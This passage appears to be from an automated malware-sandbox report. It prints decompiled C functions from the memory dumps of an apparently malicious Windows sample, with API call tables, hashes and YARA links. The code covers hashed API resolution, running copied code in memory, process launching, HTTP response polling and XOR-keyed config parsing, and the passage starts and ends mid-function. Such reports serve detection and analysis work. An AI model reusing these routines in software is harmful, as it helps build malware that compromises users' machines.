								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E100021D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E1000222B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E100022C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x100020c8
0x100020c9
0x100020ca
0x100020cd
0x100020cf
0x100020d2
0x100020d3
0x100020d5
0x100020d6
0x100020d7
0x100020da
0x100020e4
0x10002195
0x1000219c
0x100021a5
0x100020ea
0x100020ea
0x100020f0
0x100020f6
0x100020f9
0x100020fc
0x10002100
0x10002105
0x1000210a
0x1000218a
0x00000000
0x1000210c
0x1000210c
0x10002118
0x1000211a
0x10002175
0x10002175
0x1000217b
0x00000000
0x1000211c
0x1000212b
0x1000212d
0x1000212e
0x1000212f
0x10002132
0x10002132
0x10002134
0x00000000
0x10002136
0x10002136
0x10002180
0x10002138
0x10002138
0x1000213c
0x10002144
0x10002149
0x1000214e
0x1000215a
0x10002162
0x10002169
0x1000216f
0x10002173
0x00000000
0x10002173
0x10002136
0x10002134
0x00000000
0x1000211a
0x1000218e
0x1000218e
0x1000218e
0x1000210a
0x100021aa
0x100021b1

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: c8d982c37bd274d3d8930fd0680bbdacd8505101835a543198bcaa48f6ba8aeb
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: F321C536900205BFDB10DF68CCC09ABBBA5FF49390B468569ED159B24ADB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CFB09C, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00CFB09C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00CFB207(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00CFB2C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00CFB1AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00CFB207(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00CFB2A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00cfb0a0
0x00cfb0a1
0x00cfb0a2
0x00cfb0a5
0x00cfb0a7
0x00cfb0aa
0x00cfb0ab
0x00cfb0ad
0x00cfb0ae
0x00cfb0af
0x00cfb0b2
0x00cfb0bc
0x00cfb16d
0x00cfb174
0x00cfb17d
0x00cfb0c2
0x00cfb0c2
0x00cfb0c8
0x00cfb0ce
0x00cfb0d1
0x00cfb0d4
0x00cfb0d8
0x00cfb0dd
0x00cfb0e2
0x00cfb162
0x00000000
0x00cfb0e4
0x00cfb0e4
0x00cfb0f0
0x00cfb0f2
0x00cfb14d
0x00cfb14d
0x00cfb153
0x00000000
0x00cfb0f4
0x00cfb103
0x00cfb105
0x00cfb106
0x00cfb107
0x00cfb10a
0x00cfb10a
0x00cfb10c
0x00000000
0x00cfb10e
0x00cfb10e
0x00cfb158
0x00cfb110
0x00cfb110
0x00cfb114
0x00cfb11c
0x00cfb121
0x00cfb126
0x00cfb132
0x00cfb13a
0x00cfb141
0x00cfb147
0x00cfb14b
0x00000000
0x00cfb14b
0x00cfb10e
0x00cfb10c
0x00000000
0x00cfb0f2
0x00cfb166
0x00cfb166
0x00cfb166
0x00cfb0e2
0x00cfb182
0x00cfb189

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: befa44286c2333722b4bcc0afff04c8b74fb9c5aa175bee6864e15d5369b148d
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: C321C4729002099BCB14DF68CCD09BBBBA5FF45350B06C168EA259B245DB30FE15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF15EE, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00CF15EE(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0xcfd33c; // 0x3179ba0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E00CF3586(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0xcfc1ac;
				}
				_t44 = E00CF5161(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E00CF8D59(lstrlenW(0xcfeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xcfeb28) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0xcfd2a4; // 0x247a5a8
						_t73 = E00CFD11C; // 0xcfab91
						_t18 = _t75 + 0xcfeb28; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E00CF8D59(lstrlenW(0xcfec48) + _a8 + _t57 + _t58 + lstrlenW(0xcfec48) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E00CF677C(_v16);
						} else {
							_t64 =  *0xcfd2a4; // 0x247a5a8
							_t31 = _t64 + 0xcfec48; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E00CF677C(_v8);
				}
				return _v20;
			}

0x00cf15ee
0x00cf15f6
0x00cf15fc
0x00cf160c
0x00cf160f
0x00cf1614
0x00cf1619
0x00cf161b
0x00cf161b
0x00cf1624
0x00cf1629
0x00cf162e
0x00cf1634
0x00cf163e
0x00cf1647
0x00cf164e
0x00cf165c
0x00cf166e
0x00cf1673
0x00cf1678
0x00cf1681
0x00cf168a
0x00cf1693
0x00cf16a1
0x00cf16a9
0x00cf16ae
0x00cf16b1
0x00cf16bc
0x00cf16d3
0x00cf16d7
0x00cf170a
0x00cf16d9
0x00cf16dc
0x00cf16e4
0x00cf16ef
0x00cf16f7
0x00cf16ff
0x00cf1703
0x00cf1703
0x00cf16d7
0x00cf1712
0x00cf1717
0x00cf171e

APIs

GetTickCount.KERNEL32 ref: 00CF1603
lstrlen.KERNEL32(00000000,80000002), ref: 00CF163E
lstrlen.KERNEL32(?), ref: 00CF1647
lstrlen.KERNEL32(00000000), ref: 00CF164E
lstrlenW.KERNEL32(80000002), ref: 00CF165C
lstrlenW.KERNEL32(00CFEB28), ref: 00CF1665
lstrlen.KERNEL32(?), ref: 00CF16A9
lstrlen.KERNEL32(?), ref: 00CF16B1
lstrlenW.KERNEL32(?), ref: 00CF16BC
lstrlenW.KERNEL32(00CFEC48), ref: 00CF16C5

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 843b7da252760656f3d34c144160d445429eb8fe42529f1e388c5c3c9d13a9ff
Instruction ID: 1514438ea7b6494a31acf04cb1931f81acf119ade2167948ce675929487b9300
Opcode Fuzzy Hash: 843b7da252760656f3d34c144160d445429eb8fe42529f1e388c5c3c9d13a9ff
Instruction Fuzzy Hash: 5431477290020DEFCF01AFA4CC84AAEBFB5EF48314B054056EA18A7221DB31DA15DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8D99, Relevance: 12.1, APIs: 8, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CF8D99(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E00CF933F(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0xcfd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0xcfd2a4; // 0x247a5a8
					_t18 = _t46 + 0xcfe3e6; // 0x73797325
					_t66 = E00CF27B6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0xcfd2a4; // 0x247a5a8
						_t19 = _t49 + 0xcfe747; // 0x3178cef
						_t20 = _t49 + 0xcfe0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00CF94FB();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00CF94FB();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xcfd238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E00CF677C(_t68);
				goto L12;
			}

0x00cf8da1
0x00cf8da1
0x00cf8db0
0x00cf8db7
0x00cf8dbc
0x00cf8ecc
0x00cf8ed3
0x00cf8ed3
0x00cf8dcb
0x00cf8dd6
0x00cf8dd9
0x00cf8dde
0x00cf8df3
0x00cf8df9
0x00cf8dfa
0x00cf8dfd
0x00cf8e03
0x00cf8e06
0x00cf8e0b
0x00cf8e13
0x00cf8e1f
0x00cf8e23
0x00cf8eb3
0x00cf8e29
0x00cf8e29
0x00cf8e2e
0x00cf8e35
0x00cf8e49
0x00cf8e4d
0x00cf8e9c
0x00cf8e4f
0x00cf8e50
0x00cf8e57
0x00cf8e70
0x00cf8e72
0x00cf8e76
0x00cf8e7d
0x00cf8e97
0x00cf8e7f
0x00cf8e88
0x00cf8e8d
0x00cf8e8d
0x00cf8e7d
0x00cf8eab
0x00cf8eab
0x00cf8e23
0x00cf8eba
0x00cf8ec3
0x00cf8ec7
0x00000000

APIs

Part of subcall function 00CF933F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00CF8DB5,?,00000001,?,?,00000000,00000000), ref: 00CF9364
Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CF9386
Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CF939C
Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CF93B2
Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CF93C8
Part of subcall function 00CF933F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CF93DE

memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 00CF8DCB
memset.NTDLL ref: 00CF8E06

Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00CF5073,63699BCE,00CF52BC,73797325), ref: 00CF27C7
Part of subcall function 00CF27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00CF27E1

GetModuleHandleA.KERNEL32(4E52454B,03178CEF,73797325), ref: 00CF8E3C
GetProcAddress.KERNEL32(00000000), ref: 00CF8E43
HeapFree.KERNEL32(00000000,00000000), ref: 00CF8EAB

Part of subcall function 00CF94FB: GetProcAddress.KERNEL32(36776F57,00CF341A), ref: 00CF9516

CloseHandle.KERNEL32(00000000,00000001), ref: 00CF8E88
CloseHandle.KERNEL32(?), ref: 00CF8E8D
GetLastError.KERNEL32(00000001), ref: 00CF8E91

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
String ID:
API String ID: 478747673-0
Opcode ID: 7b10acf8025265fbb93054ec55d169fd4538767fc2217dcd9ee9fc68ea71d716
Instruction ID: c1dfd9e3ed9224a4e5ce8fa1d71e647358ca23e3d83c8edaf9d96bb56c94426e
Opcode Fuzzy Hash: 7b10acf8025265fbb93054ec55d169fd4538767fc2217dcd9ee9fc68ea71d716
Instruction Fuzzy Hash: 7031527590020DEFDB50AFA4DD89EBEBBBDEB08304F100465E706A7121DB345E49DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA359, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CFA359(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00CF8D59(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E00CF677C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00CF9837( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x00cfa359
0x00cfa359
0x00cfa369
0x00cfa36c
0x00cfa370
0x00cfa376
0x00cfa37b
0x00cfa394
0x00cfa3a8
0x00cfa3af
0x00cfa3b6
0x00cfa409
0x00cfa40f
0x00cfa415
0x00cfa450
0x00cfa456
0x00000000
0x00000000
0x00000000
0x00cfa415
0x00cfa3bc
0x00000000
0x00cfa3c3
0x00cfa3d1
0x00cfa3d4
0x00cfa3d7
0x00cfa3e3
0x00cfa3e7
0x00cfa449
0x00cfa3e9
0x00cfa3fb
0x00cfa439
0x00cfa444
0x00cfa3fd
0x00cfa400
0x00cfa404
0x00cfa404
0x00cfa3fb
0x00000000
0x00cfa3e7
0x00cfa3bc
0x00cfa380
0x00cfa386
0x00cfa389
0x00cfa38e
0x00000000
0x00000000
0x00000000
0x00cfa41e
0x00cfa426
0x00cfa42b
0x00cfa42e
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 00CFA370
SetEvent.KERNEL32(?), ref: 00CFA380
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00CFA3B2
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00CFA3D7
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00CFA3F7
GetLastError.KERNEL32 ref: 00CFA409

Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

GetLastError.KERNEL32(00000000), ref: 00CFA43E

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: 551b3a1419e1d79466aadef99a93b8b5da3b9ecd3ce1e1c9a698648ce2111274
Instruction ID: 700ab90324280e94827771b33ba0e351381e922074c94a4bafaa731a22b382b1
Opcode Fuzzy Hash: 551b3a1419e1d79466aadef99a93b8b5da3b9ecd3ce1e1c9a698648ce2111274
Instruction Fuzzy Hash: 3D3142B590030CEFDB61DFA5C9C4ABEFBB8EB08304F10496AE616A2151D774DA05DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1A30, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00CF1A30(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xcfd2a4; // 0x247a5a8
				_t1 = _t9 + 0xcfe62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00CF62FC(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00CF8D59(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00CF98DC(_t34, _t41, _a8);
						E00CF677C(_t41);
						_t42 = E00CFA79A(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00CF677C(_t36);
							_t36 = _t42;
						}
						_t43 = E00CF226B(_t36, _t33);
						if(_t43 != 0) {
							E00CF677C(_t36);
							_t36 = _t43;
						}
					}
					E00CF677C(_t28);
				}
				return _t36;
			}

0x00cf1a30
0x00cf1a33
0x00cf1a34
0x00cf1a3c
0x00cf1a43
0x00cf1a4a
0x00cf1a4e
0x00cf1a54
0x00cf1a5b
0x00cf1a60
0x00cf1a72
0x00cf1a76
0x00cf1a7a
0x00cf1a80
0x00cf1a85
0x00cf1a95
0x00cf1a97
0x00cf1aae
0x00cf1ab2
0x00cf1ab5
0x00cf1aba
0x00cf1aba
0x00cf1ac3
0x00cf1ac7
0x00cf1aca
0x00cf1acf
0x00cf1acf
0x00cf1ac7
0x00cf1ad2
0x00cf1ad2
0x00cf1add

APIs

Part of subcall function 00CF62FC: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,00CF1A4A,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?), ref: 00CF6363
Part of subcall function 00CF62FC: sprintf.NTDLL ref: 00CF6384

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

strcpy.NTDLL ref: 00CF1A7A
lstrcat.KERNEL32(00000000,?), ref: 00CF1A85

Part of subcall function 00CF98DC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00CF1A94,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF98F3

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2

Part of subcall function 00CFA79A: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00CF1AAE,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CFA7A4
Part of subcall function 00CFA79A: _snprintf.NTDLL ref: 00CFA802

Strings

=, xrefs: 00CF1A9C

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 8de26df75be9abca8f4ace055eb66875490f395dff3f106c3d43b2cf10a87633
Instruction ID: e91b1c87e5ed04e280c87c215ce9718cd067ff4a7f491eedd61c88fb08b2a1d1
Opcode Fuzzy Hash: 8de26df75be9abca8f4ace055eb66875490f395dff3f106c3d43b2cf10a87633
Instruction Fuzzy Hash: 86110637A0152DBB4B52B7B99C85E7F7ABDDE497A43050016FB0497112CE35CD02A7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2E55, Relevance: 9.2, APIs: 6, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CF2E55(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t18;
				signed int _t23;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t40;
				void* _t42;
				void* _t43;
				signed int _t45;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				void* _t70;
				intOrPtr _t85;

				_t71 = __ecx;
				_t18 =  *0xcfd2a0; // 0x63699bc3
				if(E00CF3034( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xcfd2d0 = _v12;
				}
				_t23 =  *0xcfd2a0; // 0x63699bc3
				if(E00CF3034( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t70 = _v12;
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t65 =  *0xcfd2a0; // 0x63699bc3
						_t29 = E00CF6676(_t71, _t70, _t65 ^ 0x724e87bc);
					}
					if(_t29 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xcfd240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t61 =  *0xcfd2a0; // 0x63699bc3
						_t30 = E00CF6676(_t71, _t70, _t61 ^ 0x2b40cc40);
					}
					if(_t30 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xcfd244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t57 =  *0xcfd2a0; // 0x63699bc3
						_t31 = E00CF6676(_t71, _t70, _t57 ^ 0x3b27c2e6);
					}
					if(_t31 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xcfd248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t53 =  *0xcfd2a0; // 0x63699bc3
						_t32 = E00CF6676(_t71, _t70, _t53 ^ 0x0602e249);
					}
					if(_t32 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xcfd004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t49 =  *0xcfd2a0; // 0x63699bc3
						_t33 = E00CF6676(_t71, _t70, _t49 ^ 0x3603764c);
					}
					if(_t33 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xcfd02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t45 =  *0xcfd2a0; // 0x63699bc3
						_t34 = E00CF6676(_t71, _t70, _t45 ^ 0x2cc1f2fd);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t42 = 0x10;
						_t43 = E00CF5AC8(_t42);
						if(_t43 != 0) {
							_push(_t43);
							E00CF59EE();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t40 =  *0xcfd2a0; // 0x63699bc3
						_t35 = E00CF6676(_t71, _t70, _t40 ^ 0xb30fc035);
					}
					if(_t35 != 0 && E00CF5AC8(0, _t35) != 0) {
						_t85 =  *0xcfd324; // 0x31795b0
						E00CF972C(_t85 + 4, _t38);
					}
